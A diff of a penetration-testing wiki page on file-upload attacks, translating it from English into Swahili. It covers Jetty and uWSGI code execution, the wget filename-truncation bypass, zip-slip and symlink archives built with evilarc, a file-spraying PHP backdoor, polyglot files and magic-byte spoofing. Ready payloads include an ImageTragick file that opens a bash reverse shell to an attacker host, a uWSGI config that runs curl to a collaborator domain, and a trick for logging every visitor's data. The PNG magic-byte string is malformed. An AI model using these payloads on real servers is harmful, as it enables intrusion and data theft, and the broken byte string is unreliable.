inapofunguliwa kwa bahati mbaya na mhusika. ### Special extension tricks @@ -98,17 +128,17 @@ The `.inc` extension is sometimes used for php files that are only used to **imp ## **Jetty RCE** -If you can upload a XML file into a Jetty server you can obtain [RCE because **new \*.xml and \*.war are automatically processed**](https://twitter.com/ptswarm/status/1555184661751648256/photo/1)**.** So, as mentioned in the following image, upload the XML file to `$JETTY_BASE/webapps/` and expect the shell! +If you can upload a XML file into a Jetty server you can obtain [RCE because **new \*.xml and \*.war are automatically processed**](https://twitter.com/ptswarm/status/1555184661751648256/photo/1)**.** Kwa hivyo, kama ilivyoelezwa kwenye picha ifuatayo, pakia faili ya XML katika `$JETTY_BASE/webapps/` na tarajia shell! ![https://twitter.com/ptswarm/status/1555184661751648256/photo/1](<../../images/image (1047).png>) ## **uWSGI RCE** -For a detailed exploration of this vulnerability check the original research: [uWSGI RCE Exploitation](https://blog.doyensec.com/2023/02/28/new-vector-for-dirty-arbitrary-file-write-2-rce.html). +Kwa uchambuzi wa kina wa udhaifu huu angalia utafiti wa asili: [uWSGI RCE Exploitation](https://blog.doyensec.com/2023/02/28/new-vector-for-dirty-arbitrary-file-write-2-rce.html). -Remote Command Execution (RCE) vulnerabilities can be exploited in uWSGI servers if one has the capability to modify the `.ini` configuration file. uWSGI configuration files leverage a specific syntax to incorporate "magic" variables, placeholders, and operators. Notably, the '@' operator, utilized as `@(filename)`, is designed to include the contents of a file. Among the various supported schemes in uWSGI, the "exec" scheme is particularly potent, allowing the reading of data from a process's standard output. This feature can be manipulated for nefarious purposes such as Remote Command Execution or Arbitrary File Write/Read when a `.ini` configuration file is processed. +Remote Command Execution (RCE) vulnerabilities zinaweza kutumiwa kwenye uWSGI servers ikiwa mtu ana uwezo wa kubadilisha `.ini` configuration file. uWSGI configuration files zinatumia sintaksia maalum kuingiza "magic" variables, placeholders, na operators. Kwa mfano, operator '@', inayotumika kama `@(filename)`, imeundwa kuingiza yaliyomo ya faili. Miongoni mwa schemes zinazotumiwa kwenye uWSGI, scheme ya "exec" ni yenye nguvu kabisa, ikiruhusu kusoma data kutoka kwenye standard output ya process. Kipengele hiki kinaweza kutumika kwa malengo mabaya kama Remote Command Execution au Arbitrary File Write/Read wakati `.ini` configuration file inapotambuliwa. -Consider the following example of a harmful `uwsgi.ini` file, showcasing various schemes: +Tazama mfano ufuatao wa `uwsgi.ini` yenye madhara, ikionyesha schemes mbalimbali: ```ini [uwsgi] ; read from a symbol @@ -126,14 +156,15 @@ extra = @(exec://curl http://collaborator-unique-host.oastify.com) ; call a function returning a char * characters = @(call://uwsgi_func) ``` -The execution of the payload occurs during the parsing of the configuration file. For the configuration to be activated and parsed, the uWSGI process must either be restarted (potentially after a crash or due to a Denial of Service attack) or the file must be set to auto-reload. The auto-reload feature, if enabled, reloads the file at specified intervals upon detecting changes. +Utekelezaji wa payload hutokea wakati wa kuchambua faili ya configuration. Ili configuration ianzishwe na kuchambuliwa, mchakato wa uWSGI lazima uanzishwe upya (inawezekana baada ya crash au kutokana na Denial of Service attack) au faili lazima iwe imewekwa kwa auto-reload. Kipengele cha auto-reload, ikiwa kimewezeshwa, kinakokota (reload) faili kwa interval zilizobainishwa inapogundua mabadiliko. -Ni muhimu kuelewa upole wa parsing wa faili za configuration za uWSGI. Hasa, payload inayojadiliwa inaweza kuingizwa ndani ya faili ya binary (kama image au PDF), na hivyo kupanua wigo wa udhaifu unaowezekana. +Ni muhimu kuelewa unyenyekevu wa namna uWSGI inavyokagua faili zake za configuration. Hasa, payload iliyojadiliwa inaweza kuingizwa ndani ya faili ya binary (kama image au PDF), na hivyo kupanua wigo wa uwezekano wa exploitation. ## **wget File Upload/SSRF Trick** -In some occasions you may find that a server is using **`wget`** to **kupakua mafaili** and you can **kuonyesha** the **URL**. In these cases, the code may be checking that the extension of the downloaded files is inside a whitelist to assure that only allowed files are going to be downloaded. However, **hii ukaguzi inaweza kupitishwa.**\ -The **maximum** length of a **filename** in **linux** is **255**, however, **wget** truncate the filenames to **236** characters. You can **download a file called "A"\*232+".php"+".gif"**, this filename will **bypass** the **check** (as in this example **".gif"** is a **valid** extension) but `wget` will **rename** the file to **"A"\*232+".php"**. +Kuna wakati unaweza kugundua kwamba server inatumia **`wget`** kupakua **faili** na unaweza **onyesha** **URL**. Katika kesi hizi, code inaweza kuwa inakagua kwamba extension ya faili zilizopakuliwa iko kwenye whitelist ili kuhakikisha kwamba faili zinazoruhusiwa pekee ndizo zitakapopakuliwa. Hata hivyo, **ukaguzi huu unaweza kuepukika.**\ + +Urefu wa **kiasi cha juu** wa **jina la faili** kwenye **linux** ni **255**, hata hivyo, **wget** hukata majina ya faili hadi **236** herufi. Unaweza **pakua faili inayoitwa "A"\*232+".php"+".gif"**, jina hili la faili lita **vuka** **ukaguzi** (kama katika mfano huu **".gif"** ni extension **halali**) lakini `wget` ata **badilisha jina** la faili kuwa **"A"\*232+".php"**. ```bash #Create file and HTTP server echo "SOMETHING" > $(python -c 'print("A"*(236-4)+".php"+".gif")') @@ -156,15 +187,15 @@ AAAAAAAAAAAAAAAAAAAAAAAAAAAAA 100%[============================================= 2020-06-13 03:14:06 (1.96 MB/s) - ‘AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.php’ saved [10/10] ``` -Note that **another option** you may be thinking of to bypass this check is to make the **HTTP server redirect to a different file**, so the initial URL will bypass the check by then wget will download the redirected file with the new name. This **won't work** **unless** wget is being used with the **parameter** `--trust-server-names` because **wget will download the redirected page with the name of the file indicated in the original URL**. +Kumbuka kuwa **chaguo jingine** unachoweza kuwa unafikiria ili kuepuka ukaguzi huu ni kufanya **HTTP server i-redirect kwa faili tofauti**, hivyo URL ya awali itapita ukaguzi lakini wget itapakua faili iliyorejelewa iliyo na jina jipya. Hii **haitafanya kazi** **isipokuwa** wget inatumiwa kwa **parameter** `--trust-server-names` kwa sababu **wget itapakua ukurasa uliorejelewa kwa jina la faili lililoonyeshwa kwenye URL ya awali**. -## Vifaa +## Zana -- [Upload Bypass](https://github.com/sAjibuu/Upload_Bypass) is a powerful tool designed to assist Pentesters and Bug Hunters in testing file upload mechanisms. It leverages various bug bounty techniques to simplify the process of identifying and exploiting vulnerabilities, ensuring thorough assessments of web applications. +- [Upload Bypass](https://github.com/sAjibuu/Upload_Bypass) ni zana yenye nguvu iliyoundwa kusaidia Pentesters na Bug Hunters katika kujaribu mechanisms za file upload. Inatumia mbinu mbalimbali za bug bounty ili kurahisisha mchakato wa kubaini na kushambulia vunjo, ikihakikisha tathmini ya kina ya web applications. ### Corrupting upload indices with snprintf quirks (historical) -Some legacy upload handlers that use `snprintf()` or similar to build multi-file arrays from a single-file upload can be tricked into forging the `_FILES` structure. Due to inconsistencies and truncation in `snprintf()` behavior, a carefully crafted single upload can appear as multiple indexed files on the server side, confusing logic that assumes a strict shape (e.g., treating it as a multi-file upload and taking unsafe branches). While niche today, this “index corruption” pattern occasionally resurfaces in CTFs and older codebases. +Baadhi ya legacy upload handlers zinazotumia `snprintf()` au mbinu zinazofanana kujenga multi-file arrays kutoka kwa single-file upload zinaweza kudanganywa kuunda kwa ajili ya kuforgesha muundo wa `_FILES`. Kutokana na kutokuwepo kwa ulinganifu na kukatwa katika tabia ya `snprintf()`, upload moja iliyotengenezwa kwa uangalifu inaweza kuonekana kama faili nyingi zenye index upande wa server, ikachanganya mantiki inayodai muundo thabiti (mfano, kuitwa multi-file upload na kuchukua matawi yasiyo salama). Ingawa ni niche leo, muundo huu wa “index corruption” mara nyingi hujitokeza tena katika CTFs na codebases za zamani. ## From File upload to other vulnerabilities @@ -178,13 +209,13 @@ Some legacy upload handlers that use `snprintf()` or similar to build multi-file - [**Open Redirect** via uploading svg file](../open-redirect.md#open-redirect-uploading-svg-files) - Try **different svg payloads** from [**https://github.com/allanlw/svg-cheatsheet**](https://github.com/allanlw/svg-cheatsheet) - [Famous **ImageTrick** vulnerability](https://mukarramkhalid.com/imagemagick-imagetragick-exploit/) -- If you can **indicate the web server to catch an image from a URL** you could try to abuse a [SSRF](../ssrf-server-side-request-forgery/index.html). If this **image** is going to be **saved** in some **public** site, you could also indicate a URL from [https://iplogger.org/invisible/](https://iplogger.org/invisible/) and **steal information of every visitor**. +- Ikiwa unaweza kuagiza web server ichukue picha kutoka kwa URL unaweza kujaribu kutumika kwa SSRF. Ikiwa picha hii itahifadhiwa kwenye tovuti ya **public**, unaweza pia kuonyesha URL kutoka [https://iplogger.org/invisible/](https://iplogger.org/invisible/) na **kuiba taarifa za kila mgeni**. - [**XXE and CORS** bypass with PDF-Adobe upload](pdf-upload-xxe-and-cors-bypass.md) -- Specially crafted PDFs to XSS: The [following page present how to **inject PDF data to obtain JS execution**](../xss-cross-site-scripting/pdf-injection.md). If you can upload PDFs you could prepare some PDF that will execute arbitrary JS following the given indications. -- Upload the \[eicar]\([**https://secure.eicar.org/eicar.com.txt**](https://secure.eicar.org/eicar.com.txt)) content to check if the server has any **antivirus** -- Check if there is any **size limit** uploading files +- PDFs zilizotengenezwa kwa njia maalum kuelekea XSS: Ukurasa ufuatao unaelezea jinsi ya **kuingiza data ya PDF ili kupata utekelezaji wa JS** (the [following page present how to **inject PDF data to obtain JS execution**](../xss-cross-site-scripting/pdf-injection.md)). Ikiwa unaweza kupakia PDFs unaweza kuandaa PDF itakayotekeleza JS yoyote kwa kufuata maelekezo yaliyotolewa. +- Pakia yaliyomo ya \[eicar]\([**https://secure.eicar.org/eicar.com.txt**](https://secure.eicar.org/eicar.com.txt)) ili kuangalia kama server ina **antivirus** +- Angalia kama kuna **size limit** wakati wa kupakia faili -Here’s a top 10 list of things that you can achieve by uploading (from [here](https://twitter.com/SalahHasoneh1/status/1281274120395685889)): +Hapa kuna orodha ya top 10 ya vitu unavyoweza kufanikisha kwa kupakia (kutoka [here](https://twitter.com/SalahHasoneh1/status/1281274120395685889)): 1. **ASP / ASPX / PHP5 / PHP / PHP3**: Webshell / RCE 2. **SVG**: Stored XSS / SSRF / XXE @@ -206,37 +237,37 @@ https://github.com/portswigger/upload-scanner ## Magic Header Bytes -- **PNG**: `"\x89PNG\r\n\x1a\n\0\0\0\rIHDR\0\0\x03H\0\xs0\x03["` +- **PNG**: `"\x89PNG\r\n\x1a\n\0\0\0\rIHDR\0\0\x03H\0\x s0\x03["` - **JPG**: `"\xff\xd8\xff"` -Refer to [https://en.wikipedia.org/wiki/List_of_file_signatures](https://en.wikipedia.org/wiki/List_of_file_signatures) for other filetypes. +Rejea [https://en.wikipedia.org/wiki/List_of_file_signatures](https://en.wikipedia.org/wiki/List_of_file_signatures) kwa aina nyingine za filetypes. ## Zip/Tar File Automatically decompressed Upload -If you can upload a ZIP that is going to be decompressed inside the server, you can do 2 things: +Ikiwa unaweza kupakia ZIP ambayo itafunguliwa ndani ya server, unaweza kufanya mambo 2: ### Symlink -Upload a link containing soft links to other files, then, accessing the decompressed files you will access the linked files: +Pakia link inayojumuisha soft links kwenda kwa faili nyingine, kisha, ukiingia kwenye faili zilizofunguliwa utapata faili zilizounganishwa: ``` ln -s ../../../index.php symindex.txt zip --symlinks test.zip symindex.txt tar -cvf test.tar symindex.txt ``` -### Decompress in different folders +### Dekompresi katika folda tofauti -Uundaji usiotarajiwa wa faili ndani ya folda wakati wa ufunguaji ni tatizo kubwa. Licha ya dhana za awali kwamba mpangilio huu ungeweza kuzuia OS-level command execution kupitia malicious file uploads, msaada wa compression wa hierarkia na uwezo wa directory traversal wa ZIP archive format unaweza kutumika vibaya. Hii inawawezesha washambulizi kupitisha vikwazo na kutoka kwenye folda za upload zilizo salama kwa kuyabadilisha kazi ya ufunguaji ya programu lengwa. +Uundaji usiotarajiwa wa faili katika saraka wakati wa dekompresi ni tatizo kubwa. Licha ya dhana za awali kwamba usanidi huu unaweza kulinda dhidi ya utekelezaji wa amri za OS kupitia upakiaji wa faili zenye madhara, msaada wa compression yenye muundo wa hieraki na uwezo wa directory traversal wa muundo wa ZIP unaweza kutumiwa. Hii inawawezesha wadukuzi kupitisha vikwazo na kutoroka kutoka kwa saraka salama za upload kwa kudanganya utendakazi wa dekompresi wa programu lengwa. -Exploit otomatiki ya kutengeneza faili hizo inapatikana kwenye [**evilarc on GitHub**](https://github.com/ptoomey3/evilarc). Zana inaweza kutumika kama ifuatavyo: +An automated exploit to craft such files is available at [**evilarc on GitHub**](https://github.com/ptoomey3/evilarc). The utility can be used as shown: ```python # Listing available options python2 evilarc.py -h # Creating a malicious archive python2 evilarc.py -o unix -d 5 -p /var/www/html/ rev.php ``` -Zaidi ya hayo, the **symlink trick with evilarc** ni chaguo. Ikiwa lengo ni kulenga faili kama `/flag.txt`, tengeneza symlink ya faili hiyo kwenye mfumo wako. Hii inahakikisha kwamba evilarc haitapata makosa wakati wa operesheni yake. +Zaidi ya hayo, chaguo la **symlink trick with evilarc** pia liko. Ikiwa lengo ni kulenga faili kama `/flag.txt`, symlink kwa faili hiyo inapaswa kuundwa kwenye mfumo wako. Hii inahakikisha kuwa evilarc haitakutana na makosa wakati wa uendeshaji wake. -Hapo chini kuna mfano wa Python code inayotumika kuunda malicious zip file: +Hapa chini kuna mfano wa Python code inayotumika kuunda faili ya zip yenye madhara: ```python #!/usr/bin/python import zipfile @@ -254,11 +285,11 @@ zip.close() create_zip() ``` -**Kunyanyasa ukandamizaji kwa file spraying** +**Kunyanyasa kompresi kwa file spraying** Kwa maelezo zaidi **angalia chapisho la awali katika**: [https://blog.silentsignal.eu/2014/01/31/file-upload-unzip/](https://blog.silentsignal.eu/2014/01/31/file-upload-unzip/) -1. **Creating a PHP Shell**: PHP code imeandikwa kutekeleza amri zinazopitishwa kupitia `$_REQUEST`. +1. **Creating a PHP Shell**: Msimbo wa PHP umeandikwa kutekeleza amri zinazopitishwa kupitia `$_REQUEST`. ```php ``` -2. **File Spraying and Compressed File Creation**: Faili nyingi zinaundwa na archive ya zip inatengenezwa ikijumuisha faili hizi. +2. **File Spraying and Compressed File Creation**: Faili nyingi zimetengenezwa na archive ya zip imeundwa ikijumuisha faili hizi. ```bash root@s2crew:/tmp# for i in `seq 1 10`;do FILE=$FILE"xxA"; cp simple-backdoor.php $FILE"cmd.php";done root@s2crew:/tmp# zip cmd.zip xx*.php ``` -3. **Modification with a Hex Editor or vi**: Majina ya faili ndani ya zip yabadilishwa kwa kutumia vi au hex editor, kubadilisha "xxA" kuwa "../" ili kupita kwa directories. +3. **Modification with a Hex Editor or vi**: Majina ya faili ndani ya zip hubadilishwa kwa kutumia vi au hex editor, kubadilisha "xxA" kuwa "../" ili kuvuka direktori. ```bash :set modifiable @@ -285,38 +316,38 @@ root@s2crew:/tmp# zip cmd.zip xx*.php ## ImageTragic -Pakia yaliyomo haya ukiwa na extension ya image ili kutumia udhaifu **(ImageMagick , 7.0.1-1)** (from the [exploit](https://www.exploit-db.com/exploits/39767)) +Pakia yaliyomo haya kwa ugani wa image ili kutumia udhaifu **(ImageMagick , 7.0.1-1)** (kutokana na [exploit](https://www.exploit-db.com/exploits/39767)) ``` push graphic-context viewbox 0 0 640 480 fill 'url(https://127.0.0.1/test.jpg"|bash -i >& /dev/tcp/attacker-ip/attacker-port 0>&1|touch "hello)' pop graphic-context ``` -## Kuingiza PHP Shell kwenye PNG +## Kuingiza PHP shell kwenye PNG -Kuingiza PHP shell katika IDAT chunk ya faili ya PNG kunaweza kupita kwa ufanisi baadhi ya operesheni za usindikaji wa picha. Fungsheni `imagecopyresized` na `imagecopyresampled` kutoka PHP-GD zina umuhimu maalum katika muktadha huu, kwani kawaida hutumika kwa kubadilisha ukubwa (resizing) na kurejesha sampuli (resampling) picha, mtawalia. Uwezo wa PHP shell iliyowekwa kubaki bila kuathiriwa na operesheni hizi ni faida kubwa kwa matumizi fulani. +Kuingiza PHP shell ndani ya IDAT chunk ya faili la PNG kunaweza kupita kwa ufanisi baadhi ya michakato ya usindikaji wa picha. Funsi za `imagecopyresized` na `imagecopyresampled` kutoka PHP-GD ni muhimu hasa katika muktadha huu, kwani kwa kawaida hutumika kwa resizing na resampling za picha, mtawalia. Uwezo wa PHP shell iliyowekwa kubaki bila kuathiriwa na shughuli hizi ni faida kubwa kwa matumizi fulani. -Uchambuzi wa kina wa mbinu hii, ikiwa ni pamoja na metodolojia yake na matumizi yanayowezekana, umetolewa katika makala ifuatayo: ["Encoding Web Shells in PNG IDAT chunks"](https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/). Rasilimali hii inatoa uelewa wa kina wa mchakato na athari zake. +Uchambuzi wa kina wa mbinu hii, pamoja na metodología na matumizi yake yanayowezekana, unapatikana katika makala ifuatayo: ["Encoding Web Shells in PNG IDAT chunks"](https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/). Rasilimali hii inatoa ufahamu mpana wa mchakato na athari zake. More information in: [https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/](https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/) -## Polyglot Files +## Faili za polyglot -Polyglot Files hutumika kama chombo maalum katika security, zikiw behaving kama chameleons zinazoweza kuwepo kwa uhalali katika miundo mingi ya faili kwa wakati mmoja. Mfano wa kuvutia ni [GIFAR](https://en.wikipedia.org/wiki/Gifar), mseto unaofanya kazi kama GIF na pia kama RAR archive. Faili hizo hazizuiliki kwa mchanganyiko huo tu; mchanganyiko kama GIF na JS au PPT na JS pia yanawezekana. +Faili za polyglot hutumika kama chombo cha kipekee katika usalama wa mtandao, zikifanya kazi kama chameleons zinazoweza kuwepo kwa uhalali katika muundo kadhaa wa faili kwa wakati mmoja. Mfano wa kuvutia ni a [GIFAR](https://en.wikipedia.org/wiki/Gifar), mseto unaofanya kazi kama GIF na kama archive ya RAR. Faili za namna hii hazina kikomo kwa jozi hii pekee; mchanganyiko kama GIF na JS au PPT na JS pia yanawezekana. -Faida kuu ya polyglot files iko katika uwezo wao wa kuzunguka udhibiti wa usalama unaochuja faili kwa msingi wa aina. Mazoezi ya kawaida katika programu mbalimbali ni kuruhusu aina maalum za faili kupakiwa—kama JPEG, GIF, au DOC—ili kupunguza hatari zaidi inayotokana na miundo hatari (mfano, JS, PHP, au Phar files). Hata hivyo, polyglot, kwa kuzingatia vigezo vya muundo vya aina nyingi za faili, inaweza kupita vikwazo hivi kwa uwazi. +Faida kuu ya faili za polyglot iko katika uwezo wao wa kupitisha hatua za usalama zinazochuja faili kulingana na aina. Mazoea ya kawaida katika programu mbalimbali ni kuruhusu aina maalum tu za faili kupakiwa—kama JPEG, GIF, au DOC—ili kupunguza hatari inayotokana na fomati zinazoweza kuwa hatari (kwa mfano, JS, PHP, au Phar). Hata hivyo, polyglot, kwa kufuata vigezo vya muundo vya aina nyingi za faili, inaweza kupita kwa siri kupitia vikwazo hivi. -Licha ya urekebishaji wao, polyglots wanakabiliwa na vizingiti. Kwa mfano, wakati polyglot inaweza kuwakilisha kwa wakati mmoja faili ya PHAR (PHp ARchive) na JPEG, ufanisi wa kupakia inaweza kutegemea sera za extension za jukwaa. Ikiwa mfumo ni mkali kuhusu extensions zinazoruhusiwa, udualiti wa muundo tu wa polyglot huenda usitosheleze kuhakikisha kupakiwa kwake. +Licha ya ufanisi wao, polyglots pia wana mipaka. Kwa mfano, ingawa polyglot inaweza kuonyesha kwa wakati mmoja faili ya PHAR (PHp ARchive) na JPEG, ufanisi wa kupakia inaweza kutegemea sera za extension za jukwaa. Ikiwa mfumo ni mkali kuhusu extensions zinazoruhusiwa, udualgawaji wa muundo wa polyglot peke yake unaweza kutokutosha kuhakikisha kupakiwa kwake. More information in: [https://medium.com/swlh/polyglot-files-a-hackers-best-friend-850bf812dd8a](https://medium.com/swlh/polyglot-files-a-hackers-best-friend-850bf812dd8a) -### Upload valid JSONs like if it was PDF +### Kupakia JSON sahihi ikionekana kama PDF -How to avoid file type detections by uploading a valid JSON file even if not allowed by faking a PDF file (techniques from **[this blog post](https://blog.doyensec.com/2025/01/09/cspt-file-upload.html)**): +Jinsi ya kuepuka ugundaji wa aina za faili kwa kupakia faili halali ya JSON hata ikiwa haikuruhusiwa kwa kuigiza PDF (techniques from **[this blog post](https://blog.doyensec.com/2025/01/09/cspt-file-upload.html)**): -- **`mmmagic` library**: As long as the `%PDF` magic bytes are in the first 1024 bytes it’s valid (get example from post) -- **`pdflib` library**: Add a fake PDF format inside a filed of the JSON so the library thinks it’s a pdf (get example from post) -- **`file` binary**: It can read up to 1048576 bytes from a file. Just create a JSON bigger than that so it cannot parse the content as a json and then inside the JSON put the initial part of a real PDF and it’ll think it’s a PDF +- **`mmagic` library**: Mradi tu `%PDF` magic bytes ziko katika 1024 bytes za mwanzo inachukuliwa kuwa halali (pata mfano kutoka kwenye post) +- **`pdflib` library**: Ongeza muundo wa PDF wa bandia ndani ya field ya JSON ili library ifikiri ni PDF (pata mfano kutoka kwenye post) +- **`file` binary**: Inaweza kusoma hadi 1048576 bytes kutoka kwa faili. Tengeneza JSON kubwa kuliko hiyo ili isiweze kuchambua maudhui kama json na kisha ndani ya JSON weka sehemu ya mwanzo ya PDF halisi na itafikiri ni PDF ## Marejeleo @@ -328,5 +359,8 @@ How to avoid file type detections by uploading a valid JSON file even if not all - [https://medium.com/swlh/polyglot-files-a-hackers-best-friend-850bf812dd8a](https://medium.com/swlh/polyglot-files-a-hackers-best-friend-850bf812dd8a) - [https://blog.doyensec.com/2025/01/09/cspt-file-upload.html](https://blog.doyensec.com/2025/01/09/cspt-file-upload.html) - [The Art of PHP: CTF‑born exploits and techniques](https://blog.orange.tw/posts/2025-08-the-art-of-php-ch/) +- [CVE-2024-21546 – NVD entry](https://nvd.nist.gov/vuln/detail/CVE-2024-21546) +- [PoC gist for LFM .php. bypass](https://gist.github.com/ImHades101/338a06816ef97262ba632af9c78b78ca) +- [0xdf – HTB Environment (UniSharp LFM upload → PHP RCE)](https://0xdf.gitlab.io/2025/09/06/htb-environment.html) {{#include ../../banners/hacktricks-training.md}}